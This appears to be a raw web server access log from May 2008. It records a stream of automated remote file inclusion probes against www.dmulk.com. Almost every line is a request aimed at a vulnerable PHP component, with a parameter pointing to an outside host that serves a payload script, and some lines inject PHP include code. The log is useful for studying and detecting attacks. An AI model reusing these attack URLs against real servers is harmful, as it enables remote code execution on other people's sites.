67.19.61.90 - - [19/May/2008:10:14:44 -0700] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.geocities.com/demon.bubble/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.61.90 - - [19/May/2008:10:14:45 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.geocities.com/demon.bubble/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.61.90 - - [19/May/2008:10:14:45 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.geocities.com/demon.bubble/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:10:14:45 -0700] "GET /logs/path/phpwcms_template/inc_script/frontend_render/navigation/config_PHPLM.php?HTML_MENU_DirPath=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:10:14:45 -0700] "GET /logs/path/phpwcms_template/inc_script/frontend_render/navigation/config_PHPLM.php?HTML_MENU_DirPath=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:10:14:45 -0700] "GET /logs/path/phpwcms_template/inc_script/frontend_render/navigation/config_PHPLM.php?HTML_MENU_DirPath=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:10:14:45 -0700] "GET /logs/path/phpwcms_template/inc_script/frontend_render/navigation/config_PHPLM.php?HTML_MENU_DirPath=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:10:14:49 -0700] "GET /logs/access_080213.log//sub.php?menu=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:10:14:49 -0700] "GET /logs/access_080213.log//sub.php?menu=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:10:14:49 -0700] "GET /logs/access_080213.log//sub.php?menu=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:10:14:50 -0700] "GET /logs/access_080213.log//sub.php?menu=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:10:14:50 -0700] "GET //sub.php?menu=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:10:14:50 -0700] "GET //sub.php?menu=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:10:14:50 -0700] "GET //sub.php?menu=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:10:14:51 -0700] "GET //sub.php?menu=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:10:14:51 -0700] "GET /logs//sub.php?menu=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:10:14:51 -0700] "GET /logs//sub.php?menu=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:10:14:51 -0700] "GET /logs//sub.php?menu=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:10:14:52 -0700] "GET /logs//sub.php?menu=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.197.68.66 - - [19/May/2008:10:15:09 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://tutorials.fyreblade.com/cx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.7.108.240 - - [19/May/2008:10:15:18 -0700] "GET /logs//start.php?s=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.7.108.240 - - [19/May/2008:10:15:18 -0700] "GET //start.php?s=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.241.132.36 - - [19/May/2008:10:15:24 -0700] "GET /logs/index.php?body=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
216.241.132.36 - - [19/May/2008:10:15:33 -0700] "GET /index.php?body=http://kingsofwarcraft.com/info? HTTP/1.1" 200 11606 "-" "libwww-perl/5.800" "www.dmulk.com"
220.125.251.37 - - [19/May/2008:10:15:33 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
220.125.251.37 - - [19/May/2008:10:15:33 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.22.204.187 - - [19/May/2008:10:15:39 -0700] "GET //include/lib.inc.php?site_path=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
67.19.61.90 - - [19/May/2008:10:15:42 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.geocities.com/demon.bubble/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
220.125.251.37 - - [19/May/2008:10:15:43 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.59.145.196 - - [19/May/2008:10:15:48 -0700] "GET /logs/access_080313.log//modules/vwar/admin/admin.php?vwar_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.59.145.196 - - [19/May/2008:10:15:48 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.59.145.196 - - [19/May/2008:10:15:49 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
220.125.251.37 - - [19/May/2008:10:15:50 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.132.204.166 - - [19/May/2008:10:15:53 -0700] "GET /logs/home.php?pagina=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.132.204.166 - - [19/May/2008:10:15:53 -0700] "GET /home.php?pagina=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
65.18.192.91 - - [19/May/2008:10:15:56 -0700] "GET //administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.51.26.82 - - [19/May/2008:10:16:07 -0700] "GET /logs/access.log//modules/vwar/admin/admin.php?vwar_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.62.115.202 - - [19/May/2008:10:16:46 -0700] "GET //errors.php?error=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
209.62.115.202 - - [19/May/2008:10:16:46 -0700] "GET /logs//errors.php?error=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
85.114.133.81 - - [19/May/2008:10:17:05 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://82.146.53.155/~paulus/on.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.18.192.91 - - [19/May/2008:10:17:05 -0700] "GET /logs/access_080219.log//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.18.192.91 - - [19/May/2008:10:17:05 -0700] "GET //administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.133.81 - - [19/May/2008:10:17:05 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://82.146.53.155/~paulus/on.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.18.192.91 - - [19/May/2008:10:17:05 -0700] "GET /logs//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.67.157.165 - - [19/May/2008:10:17:05 -0700] "GET /logs/access_080207.log//modules/4nAlbum/public/displayCategory.php?basepath=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
85.114.133.81 - - [19/May/2008:10:17:05 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://82.146.53.155/~paulus/on.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.61.90 - - [19/May/2008:10:17:06 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.geocities.com/demon.bubble/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.61.90 - - [19/May/2008:10:17:06 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.geocities.com/demon.bubble/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.61.90 - - [19/May/2008:10:17:06 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.geocities.com/demon.bubble/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.18.192.91 - - [19/May/2008:10:17:22 -0700] "GET /logs/access_080218.log//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.61.90 - - [19/May/2008:10:17:29 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.geocities.com/demon.bubble/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.61.90 - - [19/May/2008:10:17:29 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.geocities.com/demon.bubble/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.61.90 - - [19/May/2008:10:17:29 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.geocities.com/demon.bubble/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.97.181.220 - - [19/May/2008:10:17:29 -0700] "GET /logs/access_080312.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://ieras.ru/tmp/blpid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.97.181.220 - - [19/May/2008:10:17:34 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://ieras.ru/tmp/blpid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
218.38.34.67 - - [19/May/2008:10:17:35 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.97.181.220 - - [19/May/2008:10:17:36 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://ieras.ru/tmp/blpid.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
67.19.61.90 - - [19/May/2008:10:17:37 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.geocities.com/demon.bubble/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
63.223.74.103 - - [19/May/2008:10:17:41 -0700] "GET /view.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.223.74.103 - - [19/May/2008:10:17:42 -0700] "GET /index2.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.223.74.103 - - [19/May/2008:10:17:43 -0700] "GET /view.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.11.122 - - [19/May/2008:10:17:50 -0700] "GET //include/lib.inc.php?site_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.97.181.220 - - [19/May/2008:10:17:55 -0700] "GET /logs/access.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://ieras.ru/tmp/blpid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.230.212.199 - - [19/May/2008:10:18:08 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.chandonai.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.230.212.199 - - [19/May/2008:10:18:08 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.chandonai.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.230.212.199 - - [19/May/2008:10:18:08 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.chandonai.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.11.122 - - [19/May/2008:10:18:08 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.230.212.199 - - [19/May/2008:10:18:08 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.chandonai.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.230.212.199 - - [19/May/2008:10:18:08 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.chandonai.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.230.212.199 - - [19/May/2008:10:18:09 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.chandonai.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.230.212.199 - - [19/May/2008:10:18:09 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.chandonai.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.11.122 - - [19/May/2008:10:18:09 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.230.212.199 - - [19/May/2008:10:18:09 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.chandonai.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.230.212.199 - - [19/May/2008:10:18:09 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.chandonai.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.230.212.199 - - [19/May/2008:10:18:09 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.chandonai.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.230.212.199 - - [19/May/2008:10:18:09 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.chandonai.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.230.212.199 - - [19/May/2008:10:18:09 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.chandonai.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.55.6.34 - - [19/May/2008:10:18:10 -0700] "GET /config.inc.php?_path=http://www.aeromexicov.org/galeria/backups/cmd?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
74.55.6.34 - - [19/May/2008:10:18:10 -0700] "GET /logs/config.inc.php?_path=http://www.aeromexicov.org/galeria/backups/cmd?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
67.19.61.90 - - [19/May/2008:10:18:22 -0700] "GET /logs/access_080123.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.geocities.com/demon.bubble/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.61.90 - - [19/May/2008:10:18:42 -0700] "GET /logs/access_080123.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.geocities.com/demon.bubble/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
193.173.48.114 - - [19/May/2008:10:18:51 -0700] "GET /logs/access_080326.log//common/db.php?commonpath=http://www.nextenergy.pt/md.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.173.48.114 - - [19/May/2008:10:18:52 -0700] "GET //common/db.php?commonpath=http://www.nextenergy.pt/md.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.173.48.114 - - [19/May/2008:10:18:53 -0700] "GET /logs//common/db.php?commonpath=http://www.nextenergy.pt/md.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.89.31.102 - - [19/May/2008:10:19:02 -0700] "GET /logs/access.log//modules/xfsection/modify.php?dir_module=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.31.102 - - [19/May/2008:10:19:03 -0700] "GET //modules/xfsection/modify.php?dir_module=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.31.102 - - [19/May/2008:10:19:03 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
88.191.12.30 - - [19/May/2008:10:19:25 -0700] "GET /logs/access_080127.log//includes/db_adodb.php?baseDir=http://lab.matrixl.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.191.12.30 - - [19/May/2008:10:19:26 -0700] "GET //includes/db_adodb.php?baseDir=http://lab.matrixl.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.230.212.199 - - [19/May/2008:10:19:26 -0700] "GET /logs/access_080123.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.chandonai.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.191.12.30 - - [19/May/2008:10:19:26 -0700] "GET /logs//includes/db_adodb.php?baseDir=http://lab.matrixl.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.230.212.199 - - [19/May/2008:10:19:26 -0700] "GET /logs/access_080123.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.chandonai.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.3.167.234 - - [19/May/2008:10:19:45 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.3.167.234 - - [19/May/2008:10:19:51 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.3.167.234 - - [19/May/2008:10:19:51 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://marinesos.com/install/id.txt???? HTTP/1.1" 200 4139 "-" "libwww-perl/5.803" "www.dmulk.com"
69.89.31.102 - - [19/May/2008:10:20:18 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.6.26.105 - - [19/May/2008:10:20:27 -0700] "GET /tmp/?N=D HTTP/1.0" 200 981 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
80.82.209.212 - - [19/May/2008:10:20:27 -0700] "GET /logs//sub.php?menu=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.82.209.212 - - [19/May/2008:10:20:27 -0700] "GET //sub.php?menu=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
219.119.139.78 - - [19/May/2008:10:20:30 -0700] "GET /logs/access.log/index.php?pag=http://www.blasterwb.com/publicidad/windowfilm/fotos/idv.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
219.119.139.78 - - [19/May/2008:10:20:30 -0700] "GET /logs/index.php?pag=http://www.blasterwb.com/publicidad/windowfilm/fotos/idv.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
219.119.139.78 - - [19/May/2008:10:20:30 -0700] "GET /logs/access_071225.log/index.php?pag=http://www.blasterwb.com/publicidad/windowfilm/fotos/idv.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.132.204.166 - - [19/May/2008:10:20:33 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.132.204.166 - - [19/May/2008:10:20:34 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
219.119.139.78 - - [19/May/2008:10:20:38 -0700] "GET /index.php?pag=http://www.blasterwb.com/publicidad/windowfilm/fotos/idv.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.808" "www.dmulk.com"
193.173.48.114 - - [19/May/2008:10:21:15 -0700] "GET /logs/access_080325.log//common/db.php?commonpath=http://www.nextenergy.pt/md.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.133.81 - - [19/May/2008:10:21:32 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://82.146.53.155/~paulus/on.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.89.31.102 - - [19/May/2008:10:21:47 -0700] "GET /logs/access_080201.log//modules/xfsection/modify.php?dir_module=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
202.71.102.187 - - [19/May/2008:10:21:54 -0700] "GET /logs//task.php?task=http://games.enet.com.cn/zhuanti/dkp/02.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.71.102.187 - - [19/May/2008:10:21:55 -0700] "GET //task.php?task=http://games.enet.com.cn/zhuanti/dkp/02.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.112.2 - - [19/May/2008:10:22:14 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://www.47rclan.com/ultrastats/include/.bin/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.112.2 - - [19/May/2008:10:22:14 -0700] "GET //include/admin.lib.inc.php?site_path=http://www.47rclan.com/ultrastats/include/.bin/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.215.67.3 - - [19/May/2008:10:22:15 -0700] "GET /logs/access_080124.log//oneadmin/photogallery/include.php?path[docroot]=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
213.215.67.3 - - [19/May/2008:10:22:15 -0700] "GET /logs/access_080124.log/errors.php?error=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
74.52.112.2 - - [19/May/2008:10:22:15 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://www.47rclan.com/ultrastats/include/.bin/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.215.67.3 - - [19/May/2008:10:22:16 -0700] "GET //oneadmin/photogallery/include.php?path[docroot]=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
213.215.67.3 - - [19/May/2008:10:22:16 -0700] "GET /errors.php?error=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
